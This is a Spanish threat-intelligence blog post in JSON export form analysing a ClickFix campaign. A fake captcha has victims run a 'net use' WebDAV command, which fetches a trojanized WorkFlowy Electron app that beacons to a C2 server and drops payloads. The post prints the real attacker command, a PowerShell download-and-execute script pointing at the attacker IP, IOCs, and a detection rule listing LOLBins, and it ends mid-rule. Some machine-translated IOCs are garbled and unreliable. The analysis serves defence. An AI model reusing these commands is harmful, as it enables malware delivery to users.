{"id":248,"date":"2026-03-13T17:49:07","date_gmt":"2026-03-13T17:49:07","guid":{"rendered":"https:\/\/cybercolombia.co\/index.php\/2026\/03\/13\/investigando-una-nueva-variante-de-click-fix-cyberdefensa-mx\/"},"modified":"2026-03-13T17:49:07","modified_gmt":"2026-03-13T17:49:07","slug":"investigando-una-nueva-variante-de-click-fix-cyberdefensa-mx","status":"publish","type":"post","link":"https:\/\/cybercolombia.co\/index.php\/2026\/03\/13\/investigando-una-nueva-variante-de-click-fix-cyberdefensa-mx\/","title":{"rendered":"Investigando una nueva variante de Click-Fix \u2013 CYBERDEFENSA.MX"},"content":{"rendered":"<div id=\"articlebody\">\n<p><strong><em>Descargo de responsabilidad<\/em><\/strong><em>: Este informe ha sido elaborado por el Centro de Investigaci\u00f3n de Amenazas para mejorar la concienciaci\u00f3n sobre la ciberseguridad y apoyar el fortalecimiento de las capacidades de defensa. Se basa en investigaciones y observaciones independientes del panorama de amenazas actual disponibles en el momento de la publicaci\u00f3n. El contenido est\u00e1 destinado \u00fanicamente a fines informativos y de preparaci\u00f3n.<\/em><\/p>\n<p>Lea m\u00e1s blogs sobre inteligencia de amenazas e investigaci\u00f3n de adversarios: <a href=\"https:\/\/atos.net\/en\/lp\/cybershield\" rel=\"noopener\" target=\"_blank\">https:\/\/atos.net\/es\/lp\/cybershield<\/a><\/p>\n<h4 style=\"text-align: left;\"><strong> Resumen<\/strong><\/h4>\n<p>Los investigadores de Atos identificaron una nueva variante de la popular t\u00e9cnica ClickFix, donde los atacantes convencen al usuario para que ejecute un comando malicioso en su propio dispositivo a trav\u00e9s del acceso directo Win + R. En esta variaci\u00f3n, se utiliza un comando \u00abnet use\u00bb para asignar una unidad de red desde un servidor externo, despu\u00e9s de lo cual se ejecuta un archivo por lotes \u00ab.cmd\u00bb alojado en esa unidad. El script descarga un archivo ZIP, lo descomprime y ejecuta la aplicaci\u00f3n WorkFlowy leg\u00edtima con una l\u00f3gica maliciosa modificada oculta dentro del archivo \u00ab.asar\u00bb. Esto act\u00faa como una baliza C2 y un gotero para la carga \u00fatil final del malware.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgI3trtAac3m4CbyOoWlIcWGgQJbB2hIcdMKsrtWT9acSAAUs3llaXtiuIbYzhI4HGptQBTHZnlKN9nfuQ22yM8mszDKFZzuMHd0TqbcOngBgYC6Lr21yD6O8bXQwO-6e8TI6hq_ip3wpUkEkWWz4JdsmgcgC0s7jDisLY2RZ1marb9m2DEIHvHNpH-oxzV\/s1700-e365\/1.png\" style=\"clear: left; display: block; margin-left: auto; margin-right: auto;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgI3trtAac3m4CbyOoWlIcWGgQJbB2hIcdMKsrtWT9acSAAUs3llaXtiuIbYzhI4HGptQBTHZnlKN9nfuQ22yM8mszDKFZzuMHd0TqbcOngBgYC6Lr21yD6O8bXQwO-6e8TI6hq_ip3wpUkEkWWz4JdsmgcgC0s7jDisLY2RZ1marb9m2DEIHvHNpH-oxzV\/s1700-e365\/1.png\" alt=\"\" border=\"0\" data-original-height=\"251\" data-original-width=\"819\"\/><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figura 1: descripci\u00f3n general de alto nivel del flujo de ataques.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 style=\"text-align: left;\">Descripci\u00f3n general del ataque<\/h2>\n<p>En esta versi\u00f3n, el vector de ataque inicial es el mismo que en todas las dem\u00e1s, una p\u00e1gina web que se hace pasar por un mecanismo captcha \u2013 \u201chappyglamper[.]ro\u00bb. Solicita al usuario que abra la aplicaci\u00f3n Ejecutar mediante \u00abWin+R\u00bb, seguido de \u00abCtrl+V\u00bb y \u00abEnter\u00bb.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVCV5rgx3oWMp5a4WXJ3NP57gv655-dINgkx4LRLg8lwamGFhO1hFqFun_3KGsnLpGe5lI637hSaEb7GoR1odH6M2HRFTKEVOl33_PEVYhKvKM9J-4BdBGys59SX-X38WWHQH9i81cK_P8rnjm6QDfUZfe8vtLlciT8rrlga1l0f2VBEXyI6OJeQzYNjof\/s1700-e365\/2.png\" style=\"clear: left; display: block; margin-left: auto; margin-right: auto;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVCV5rgx3oWMp5a4WXJ3NP57gv655-dINgkx4LRLg8lwamGFhO1hFqFun_3KGsnLpGe5lI637hSaEb7GoR1odH6M2HRFTKEVOl33_PEVYhKvKM9J-4BdBGys59SX-X38WWHQH9i81cK_P8rnjm6QDfUZfe8vtLlciT8rrlga1l0f2VBEXyI6OJeQzYNjof\/s1700-e365\/2.png\" alt=\"\" border=\"0\" data-original-height=\"601\" data-original-width=\"859\"\/><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figura 2: Sitio web de phishing 1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7sCd3P7-nA23PlNtVj_aKDRcMNCRC5BGg6HbuBawoSAQsOUXlQswhyKvafeNK457Gn6EFnXxD-nJgW-DQDg97bfYivG_ymb2KKHR8EL9K_AYtPb5k_2P7sClDst1ujYhM_ZBs3kIhKmlQvBpGGoth6w5oyi8GrDsGrSVW_uDcV25Sgn7gCxMYTc7aQyjt\/s1700-e365\/3.png\" style=\"clear: left; display: block; margin-left: auto; margin-right: auto;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7sCd3P7-nA23PlNtVj_aKDRcMNCRC5BGg6HbuBawoSAQsOUXlQswhyKvafeNK457Gn6EFnXxD-nJgW-DQDg97bfYivG_ymb2KKHR8EL9K_AYtPb5k_2P7sClDst1ujYhM_ZBs3kIhKmlQvBpGGoth6w5oyi8GrDsGrSVW_uDcV25Sgn7gCxMYTc7aQyjt\/s1700-e365\/3.png\" alt=\"\" border=\"0\" data-original-height=\"552\" data-original-width=\"855\"\/><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figura 3: Sitio web de phishing 2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Esto ejecuta el siguiente comando:<\/p>\n<pre><code>\u201ccmd.exe\u201d \/c net use Z: https:\/\/94.156.170[.]255\/webdav \/persistent:no &amp;&amp; \u201cZ:\\update.cmd\u201d &amp; net use Z: \/delete<\/code><\/pre>\n<p>Normalmente, en esta etapa, los atacantes han utilizado PowerShell o mshta para descargar y ejecutar la siguiente etapa del malware. Aqu\u00ed, en cambio, podemos ver que el \u00abuso de red\u00bb se utiliza para asignar y conectarse a una unidad de red de un servidor externo desde el cual se ejecuta un script por lotes. Si bien no son novedosos, estos TTP nunca antes se hab\u00edan visto en ataques ClickFix. Combinada con las siguientes etapas poco comunes de patrones de infecci\u00f3n, esta campa\u00f1a brinda a los adversarios altas posibilidades de evadir los controles defensivos y permanecer fuera del radar de los defensores.<\/p>\n<p>En este caso, la variante ClickFix observada del flujo de ejecuci\u00f3n evit\u00f3 con \u00e9xito la detecci\u00f3n de Microsoft Defender para Endpoint. Los equipos de seguridad de Atos pudieron detectarlo solo gracias al servicio interno Threat Hunting, que se centr\u00f3 en el principal aspecto de comportamiento de la t\u00e9cnica ClickFix: la ejecuci\u00f3n inicial a trav\u00e9s de la clave de registro RunMRU (<a href=\"https:\/\/docs.google.com\/document\/d\/1r34Rnlsdw-ISnATBS-SfmYNTu1Ln07IY\/edit#heading=h.65tqoanctmva\" rel=\"noopener\" target=\"_blank\">consulta de caza disponible en la secci\u00f3n Ap\u00e9ndice<\/a>).<\/p>\n<p>El script de ejecuci\u00f3n inicial \u201cupdate.cmd\u201d se carga desde la unidad asignada y se ejecuta; despu\u00e9s de eso, se elimina la unidad asignada. Contenido de \u201cupdate.cmd\u201d:<\/p>\n<pre><code>start \"\" \/min powershell -WindowStyle Hidden -Command \"Invoke-WebRequest 'https:\/\/94.156.170[.]255\/flowy.zip' -OutFile \\\"$env:TEMP\\dl.zip\\\";\nExpand-Archive \\\"$env:TEMP\\dl.zip\\\" -DestinationPath \\\"$env:LOCALAPPDATA\\MyApp\\\" -Force;\nStart-Process \\\"$env:LOCALAPPDATA\\MyApp\\WorkFlowy.exe\\\"\"<\/code><\/pre>\n<p>Esto genera una instancia de PowerShell que descarga un archivo zip y lo extrae en el directorio \u201c%LOCALAPPDATA%\\MyApp\\\u201d. Luego ejecuta el binario \u201cWorkFlowy.exe\u201d.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhYswLn0RePHmWBtzdP1dCrwiIIc82DXP4R3W4Y3PLHKryzn3NeKYVnDfUXW4UEfkKPauBR3q5pq7-aua4PWT7lwQvvFz1QeljX9o-b6tZGXWK0CPnLliahPjFOk_BILSK9nHI4FJMF1-qzhbzIxaNYQ0GvqxShpYF_miFZYTMuNzERAprfA4OKO1p2Qnn1\/s1700-e365\/4.png\" style=\"clear: left; display: block; margin-left: auto; margin-right: auto;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhYswLn0RePHmWBtzdP1dCrwiIIc82DXP4R3W4Y3PLHKryzn3NeKYVnDfUXW4UEfkKPauBR3q5pq7-aua4PWT7lwQvvFz1QeljX9o-b6tZGXWK0CPnLliahPjFOk_BILSK9nHI4FJMF1-qzhbzIxaNYQ0GvqxShpYF_miFZYTMuNzERAprfA4OKO1p2Qnn1\/s1700-e365\/4.png\" alt=\"\" border=\"0\" data-original-height=\"537\" data-original-width=\"623\"\/><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figura 4: Contenido del archivo flowy.zip<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>An\u00e1lisis de flujo de trabajo<\/h2>\n<p>El archivo contiene una aplicaci\u00f3n de escritorio WorkFlowy (versi\u00f3n 1.4.1050), firmada por el desarrollador \u201cFunRoutine Inc.\u201d, distribuida como un paquete de aplicaciones Electron. Las aplicaciones de Electron se escriben utilizando tecnolog\u00edas web populares (HTML, CSS y JavaScript) y utilizan archivos \u00ab.asar\u00bb para empaquetar el c\u00f3digo fuente durante el empaquetado de la aplicaci\u00f3n. Se hace por varias razones, como mitigar problemas relacionados con nombres de rutas largos en Windows. El c\u00f3digo malicioso se inyect\u00f3 en main.js, el punto de entrada de Node.js de la aplicaci\u00f3n, oculto dentro del archivo app.asar. <\/p>\n<p><b>Perfil T\u00e9cnico<\/b><\/p>\n<table border=\"1\" cellpadding=\"8\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td>Propiedad<\/td>\n<td>Valor<\/td>\n<\/tr>\n<tr>\n<td>Aplicaci\u00f3n de destino<\/td>\n<td>Escritorio WorkFlowy (electr\u00f3n)<\/td>\n<\/tr>\n<tr>\n<td>Versi\u00f3n maliciosa<\/td>\n<td>1.4.1050<\/td>\n<\/tr>\n<tr>\n<td>Archivo malicioso<\/td>\n<td>recursos\/app.asar \u2192 \/main.js<\/td>\n<\/tr>\n<tr>\n<td>dominio C2<\/td>\n<td>cloudflare.report\/forever\/e\/<\/td>\n<\/tr>\n<tr>\n<td>IP de origen C2<\/td>\n<td>144[.]31[.]165[.]173 (Fr\u00e1ncfort, AS215439 play2go.cloud)<\/td>\n<\/tr>\n<tr>\n<td>Dominio registrado<\/td>\n<td>Enero de 2026, registrante de HK, registrador OnlineNIC<\/td>\n<\/tr>\n<tr>\n<td>Archivo de identificaci\u00f3n de v\u00edctima<\/td>\n<td>%APPDATA%\\id.txt<\/td>\n<\/tr>\n<tr>\n<td>Director de puesta en escena con cuentagotas<\/td>\n<td>%TEMPERATURA%\\[unix_timestamp]\\<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Vector de infecci\u00f3n<\/h2>\n<p>El archivo malicioso ASAR es un reemplazo directo del leg\u00edtimo resources\/app.asar. El atacante volvi\u00f3 a empaquetar una versi\u00f3n anterior de la aplicaci\u00f3n (v1.4 frente a la v4.3 actual) con c\u00f3digo inyectado. <\/p>\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmYPCoBc5kmx94QoNAA9hET1TsWD-yPc8NzLHNsG_-C5z6XyFIJvP2xj4MvVYILcJoZGBeuZ_2W1ViYfID7vHfVa3ZuqhqSHX6Gxwyjz9HZ7S_6ALOZrezMDWmsd_FQoypy94186E3YIvA34Zu7nMqhU5-x9zosyJxR5_i0Crpk5N_cYibj0uYx3jUuZ2q\/s1700-e365\/5.png\" style=\"display: block; margin-left: auto; margin-right: auto;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmYPCoBc5kmx94QoNAA9hET1TsWD-yPc8NzLHNsG_-C5z6XyFIJvP2xj4MvVYILcJoZGBeuZ_2W1ViYfID7vHfVa3ZuqhqSHX6Gxwyjz9HZ7S_6ALOZrezMDWmsd_FQoypy94186E3YIvA34Zu7nMqhU5-x9zosyJxR5_i0Crpk5N_cYibj0uYx3jUuZ2q\/s1700-e365\/5.png\" alt=\"\" border=\"0\" data-original-height=\"103\" data-original-width=\"629\"\/><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figura 5: Contenido del subdirectorio \u00abrecursos\u00bb<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>C\u00f3digo malicioso (gotero\/baliza)<\/h2>\n<p>Cuando se ejecuta WorkFlowy, busca el archivo app.asar en la ruta relativa codificada en el binario. Luego lee el archivo main.js desde su interior, lo decodifica en una cadena y lo analiza en el motor JavaScript V8 de Google integrado, que lo ejecuta. Los atacantes han reemplazado el main.js leg\u00edtimo por uno que ellos mismos han creado. En lugar de scripts bien estructurados, han utilizado una estructura en l\u00ednea muy ofuscada, agregando c\u00f3digo malicioso encima del leg\u00edtimo, asegurando que se ejecute primero y bloqueando la funcionalidad WorkFlowy.<\/p>\n<p>El c\u00f3digo malicioso contiene varias funciones cr\u00edticas:<\/p>\n<ol>\n<li><strong>El malware se ejecuta antes de que se inicie la aplicaci\u00f3n leg\u00edtima: <\/strong>El IIFE inyectado se abre con await f(), el bucle infinito de baliza C2. Debido a que f() nunca se resuelve, todo el c\u00f3digo de inicializaci\u00f3n leg\u00edtimo de WorkFlowy que sigue se bloquea permanentemente. El malware se ejecuta con privilegios completos de Node.js inmediatamente despu\u00e9s del lanzamiento.<\/li>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg2wmCWmfL3q0u7DidtQVmfTTS0nmEBTsaF-PzOrrwR5jb_jyhvx_TqxfTLxFvakuNPuL60O1X-49tWXw3vDCLlQlsLc7CS4HZBKwTx_VwCr-oMzZqSUOGLwddzmiwl57bWHDIBh69bPOhBBZxrs_5r-FI3_oyM99fAGfyiBK3FA2xgUkiJb2r3-9F6xgq6\/s1700-e365\/6.png\" style=\"display: block; margin-left: 1em; margin-right: 1em;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg2wmCWmfL3q0u7DidtQVmfTTS0nmEBTsaF-PzOrrwR5jb_jyhvx_TqxfTLxFvakuNPuL60O1X-49tWXw3vDCLlQlsLc7CS4HZBKwTx_VwCr-oMzZqSUOGLwddzmiwl57bWHDIBh69bPOhBBZxrs_5r-FI3_oyM99fAGfyiBK3FA2xgUkiJb2r3-9F6xgq6\/s1700-e365\/6.png\" alt=\"\" border=\"0\" data-original-height=\"112\" data-original-width=\"831\"\/><\/a><\/div>\n<li><strong>Toma de huellas dactilares persistente de la v\u00edctima a trav\u00e9s de %APPDATA%\\id.txt: <\/strong>En la primera ejecuci\u00f3n se genera un ID alfanum\u00e9rico aleatorio de 8 caracteres y se escribe en %APPDATA%\\id.txt. En ejecuciones posteriores, la identificaci\u00f3n almacenada se vuelve a leer, lo que le brinda al atacante un identificador estable para cada m\u00e1quina v\u00edctima en todas las sesiones.<\/li>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgm0LYXhyphenhyphenmmNPx_kxWrx6TFqNIqceM9oDWau8aE5nGLG6PgqeY0JHq_9lkhPRvLGR5A9f6AxA5plE1M1TJfrnzhT-CAi4E6FCjgw4AR0kXVCTleda83SUooOVB0y6W-le2WiDi-z-pi32ZsaQ8r4WeGzZfdpVhjVUF55UB2JG5ylCWx__0KM-BEZrgNJCDH\/s1700-e365\/7.png\" style=\"display: block; margin-left: 1em; margin-right: 1em;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgm0LYXhyphenhyphenmmNPx_kxWrx6TFqNIqceM9oDWau8aE5nGLG6PgqeY0JHq_9lkhPRvLGR5A9f6AxA5plE1M1TJfrnzhT-CAi4E6FCjgw4AR0kXVCTleda83SUooOVB0y6W-le2WiDi-z-pi32ZsaQ8r4WeGzZfdpVhjVUF55UB2JG5ylCWx__0KM-BEZrgNJCDH\/s1700-e365\/7.png\" alt=\"\" border=\"0\" data-original-height=\"190\" data-original-width=\"649\"\/><\/a><\/div>\n<li><strong>Baliza C2: extrae la identidad del host cada 2 segundos: <\/strong>La funci\u00f3n u() env\u00eda una POST HTTP que contiene la identificaci\u00f3n \u00fanica de la v\u00edctima, el nombre de la m\u00e1quina y el nombre de usuario de Windows al servidor C2. El bucle en f() repite esto indefinidamente con un intervalo de 2 segundos.<\/li>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEht4ezSR2pCzgomSUX4Tv78HMTDEo18NoHOb3wMUusPjp5og-nqRuCYUvjdlsZpjgQscNI0YXWB2k7UZ8xUz3KlNgEsLrO56kaHVJSEgZ1tnGgFfLuqjLSvE_IhKNEgeCQqDGRKfgi6sUKHdCXQDFyChmv9sqgpg_nptIYV28I0v3hwJqKV_PzybpUVNqbC\/s1700-e365\/8.png\" style=\"display: block; margin-left: 1em; margin-right: 1em;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEht4ezSR2pCzgomSUX4Tv78HMTDEo18NoHOb3wMUusPjp5og-nqRuCYUvjdlsZpjgQscNI0YXWB2k7UZ8xUz3KlNgEsLrO56kaHVJSEgZ1tnGgFfLuqjLSvE_IhKNEgeCQqDGRKfgi6sUKHdCXQDFyChmv9sqgpg_nptIYV28I0v3hwJqKV_PzybpUVNqbC\/s1700-e365\/8.png\" alt=\"\" border=\"0\" data-original-height=\"410\" data-original-width=\"830\"\/><\/a><\/div>\n<li><strong>Descarga y ejecuci\u00f3n remota de carga \u00fatil:<\/strong> La funci\u00f3n p() recibe un objeto de tarea del C2, decodifica el contenido del archivo codificado en base64, lo escribe en un directorio con marca de tiempo en %TEMP% y ejecuta cualquier .exe a trav\u00e9s de child_process.exec.<\/li>\n<\/ol>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjZoXWMCcrVJF_eEF9OrKhfTuwUu2_qRvFs4CkXQX-f9zbsDGJmaiXQYs9dIdSC5rLdiGlxQ1GCYDWGRbmiAodrIYQ4LQHHSMzgDodOOCaNTTXThRCUqhFIVCkp9j0kiNdUsSI8HCuQkE3QWyX1OKROrPgV3nf60aUYWGXOmv1fcIJVG7OmM0Bvf3ST0Sce\/s1700-e365\/9.png\" style=\"display: block; margin-left: 1em; margin-right: 1em;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjZoXWMCcrVJF_eEF9OrKhfTuwUu2_qRvFs4CkXQX-f9zbsDGJmaiXQYs9dIdSC5rLdiGlxQ1GCYDWGRbmiAodrIYQ4LQHHSMzgDodOOCaNTTXThRCUqhFIVCkp9j0kiNdUsSI8HCuQkE3QWyX1OKROrPgV3nf60aUYWGXOmv1fcIJVG7OmM0Bvf3ST0Sce\/s1700-e365\/9.png\" alt=\"\" border=\"0\" data-original-height=\"341\" data-original-width=\"650\"\/><\/a><\/div>\n<p>Si no se establece la conexi\u00f3n C2, no se generan archivos ni directorios. En el momento de realizar este an\u00e1lisis, el dominio C2 ya no respond\u00eda.<\/p>\n<h2>Por qu\u00e9 Electron es un mecanismo de entrega eficaz<\/h2>\n<p>El c\u00f3digo malicioso se ejecuta en el proceso principal de Node.js, fuera del entorno limitado de Chromium, con todos los privilegios del usuario que ha iniciado sesi\u00f3n, lo que permite que el c\u00f3digo malicioso ejecute cualquier acci\u00f3n que el usuario pueda realizar en el sistema. En realidad, no se escriben archivos en el disco y, dado que la carga \u00fatil maliciosa est\u00e1 empaquetada dentro del archivo \u00ab.asar\u00bb, tambi\u00e9n ayuda a ocultar el c\u00f3digo malicioso.<\/p>\n<h2>Persistencia<\/h2>\n<p>No se implementa ninguna persistencia a nivel del sistema operativo a trav\u00e9s del cuentagotas. La baliza se ejecuta solo mientras WorkFlowy est\u00e1 abierto. El \u00fanico artefacto escrito en el disco antes de la entrega en la siguiente etapa es %APPDATA%\\id.txt (ID de seguimiento de la v\u00edctima), y eso solo si la conexi\u00f3n a C2 se establece correctamente. Presumiblemente, se delega una persistencia a nivel del sistema operativo a cualquier carga \u00fatil que entregue el C2 a trav\u00e9s del cuentagotas.<\/p>\n<p>Lea m\u00e1s blogs sobre inteligencia de amenazas e investigaci\u00f3n de adversarios: <a href=\"https:\/\/atos.net\/en\/lp\/cybershield\" rel=\"noopener\" target=\"_blank\">https:\/\/atos.net\/es\/lp\/cybershield<\/a><\/p>\n<h2 style=\"text-align: left;\">Conclusiones clave<\/h2>\n<p>Esta variante de ClickFix es importante porque aleja el acceso inicial de los motores de ejecuci\u00f3n y secuencias de comandos de los que com\u00fanmente se abusa, como PowerShell, MSHTA y WScript, y en su lugar depende del uso de la red para abusar de WebDAV como mecanismo de entrega. Las campa\u00f1as anteriores de ClickFix generalmente se expon\u00edan al invocar directamente int\u00e9rpretes o binarios que viven fuera de la tierra y que est\u00e1n fuertemente monitoreados por soluciones EDR modernas. Por el contrario, esta iteraci\u00f3n monta un recurso compartido WebDAV remoto como una unidad local, ejecuta un archivo por lotes alojado mediante la sem\u00e1ntica est\u00e1ndar del sistema de archivos y elimina la asignaci\u00f3n inmediatamente despu\u00e9s de su uso. Esto muestra que ClickFix a\u00fan evoluciona, expande su arsenal de m\u00e9todos de ejecuci\u00f3n de proxy y comienza a utilizar utilidades de red nativas.<\/p>\n<p>La l\u00f3gica maliciosa se oculta reemplazando el contenido del archivo app.asar de la aplicaci\u00f3n Workflowy con una versi\u00f3n troyanizada de main.js. Debido a que el c\u00f3digo se ejecuta dentro del proceso principal de Electron y permanece empaquetado dentro de una aplicaci\u00f3n leg\u00edtima, evita muchas detecciones de comportamiento y basadas en archivos que se centran en cargadores independientes o int\u00e9rpretes de scripts. Los archivos ASAR rara vez se inspeccionan, lo que permite que la l\u00f3gica del dropper se ejecute durante el inicio normal de la aplicaci\u00f3n con una visibilidad m\u00ednima.<\/p>\n<p>Esta actividad no fue detectada por los controles de seguridad y solo se identific\u00f3 mediante la b\u00fasqueda de amenazas dirigida en Atos. La detecci\u00f3n se bas\u00f3 en analizar el contexto de ejecuci\u00f3n en lugar de los indicadores de carga \u00fatil, espec\u00edficamente buscando ejecuciones de comandos sospechosas que se originaran en el cuadro de di\u00e1logo Ejecutar del Explorador (registrado dentro de la clave de registro RunMRU). Esto subraya la creciente importancia de la caza de amenazas como mecanismo de detecci\u00f3n complementario: a medida que las campa\u00f1as de ClickFix cambian hacia utilidades nativas y aplicaciones confiables que generan pocas alertas, s\u00f3lo la caza proactiva y basada en hip\u00f3tesis puede ayudar a sacar a la luz estas se\u00f1ales d\u00e9biles lo suficientemente temprano como para interrumpir la cadena de ataque.<\/p>\n<h2 style=\"text-align: left;\">Ap\u00e9ndices<\/h2>\n<h4 style=\"text-align: left;\">COI<\/h4>\n<table border=\"1\" cellpadding=\"8\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td>Dominio<\/td>\n<td>llamarada de nube[.]informe<\/td>\n<\/tr>\n<tr>\n<td>Dominio<\/td>\n<td>felizglamper[.]ro<\/td>\n<\/tr>\n<tr>\n<td>IP<\/td>\n<td>94[.]156[.]170[.]255<\/td>\n<\/tr>\n<tr>\n<td>IP<\/td>\n<td>144[.]31[.]165[.]173<\/td>\n<\/tr>\n<tr>\n<td>URL<\/td>\n<td>https:\/\/nubeflare[.]informe\/para siempre\/e\/<\/td>\n<\/tr>\n<tr>\n<td>Archivo<\/td>\n<td>%APPDATA%\\id.txt<\/td>\n<\/tr>\n<tr>\n<td>Camino<\/td>\n<td>%TEMPERATURA%\\[13-digit-timestamp]\\<\/td>\n<\/tr>\n<tr>\n<td>SHA256<\/td>\n<td>a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (aplicaci\u00f3n.asar)<\/td>\n<\/tr>\n<tr>\n<td>SHA256<\/td>\n<td>9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe: versi\u00f3n anterior del binario leg\u00edtimo, no malicioso)<\/td>\n<\/tr>\n<tr>\n<td>SHA256<\/td>\n<td>dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (principal.js)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 style=\"text-align: left;\">Consulta de caza<\/h3>\n<ul style=\"text-align: left;\">\n<li>t\u00edtulo: Comandos sospechosos ejecutados mediante el cuadro de di\u00e1logo Ejecutar <\/li>\n<li>identificaci\u00f3n: 20891a30-032e-4f15-a282-fa4a8b0d8aae<\/li>\n<li>estado: experimental<\/li>\n<li>descripci\u00f3n: <\/li>\n<li>  Detecta int\u00e9rpretes de comandos sospechosos y LOLBins escritos en la clave de registro Explorer RunMRU (com\u00fanmente utilizada para el historial de di\u00e1logo de ejecuci\u00f3n), con explorer.exe como proceso de inicio.<\/li>\n<li>autor: CVR<\/li>\n<li>fecha: 2026-03-05<\/li>\n<li>etiquetas:<\/li>\n<li>  \u2013 ataque.ejecuci\u00f3n<\/li>\n<li>  \u2013 ataque.t1059<\/li>\n<li>  \u2013 ataque.defense_evasion<\/li>\n<li>fuente de registro:<\/li>\n<li>  categor\u00eda: conjunto_registro<\/li>\n<li>  producto: ventanas<\/li>\n<li>  definici\u00f3n: \u00abID de evento de Sysmon 13 (conjunto de valores de registro) o telemetr\u00eda de registro EDR equivalente\u00bb<\/li>\n<li>detecci\u00f3n:<\/li>\n<li>  clave_selecci\u00f3n:<\/li>\n<li>  TargetObject|contiene: &#8216;\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU&#8217;<\/li>\n<li>  proceso_selecci\u00f3n:<\/li>\n<li>  Imagen|termina con: &#8216;\\explorer.exe&#8217;<\/li>\n<li>  datos_de_selecci\u00f3n:<\/li>\n<li>  Detalles|contiene:<\/li>\n<li>  \u2013 &#8216;cmd&#8217;<\/li>\n<li>  \u2013 &#8216;powershell&#8217;<\/li>\n<li>  \u2013 &#8216;cmd.exe&#8217;<\/li>\n<li>  \u2013 &#8216;powershell.exe&#8217;<\/li>\n<li>  \u2013 &#8216;wscript.exe &#8216;<\/li>\n<li>  \u2013 &#8216;cscript.exe &#8216;<\/li>\n<li>  \u2013 &#8216;net.exe&#8217;<\/li>\n<li>  \u2013 &#8216;net1.exe&#8217;<\/li>\n<li>  \u2013 &#8216;sh.exe&#8217;<\/li>\n<li>  \u2013 &#8216;bash.exe&#8217;<\/li>\n<li>  \u2013 &#8216;schtasks.exe&#8217;<\/li>\n<li>  \u2013 &#8216;regsvr32.exe&#8217;<\/li>\n<li>  \u2013 &#8216;hh.exe&#8217;<\/li>\n<li>  \u2013 &#8216;wmic.exe &#8216;<\/li>\n<li>  \u2013 &#8216;mshta.exe&#8217;<\/li>\n<li>  \u2013 &#8216;rundll32.exe&#8217;<\/li>\n<li>  \u2013 &#8216;msiexec.exe &#8216;<\/li>\n<li>  \u2013 &#8216;forfiles.exe &#8216;<\/li>\n<li>  \u2013 &#8216;scriptrunner.exe&#8217;<\/li>\n<li>  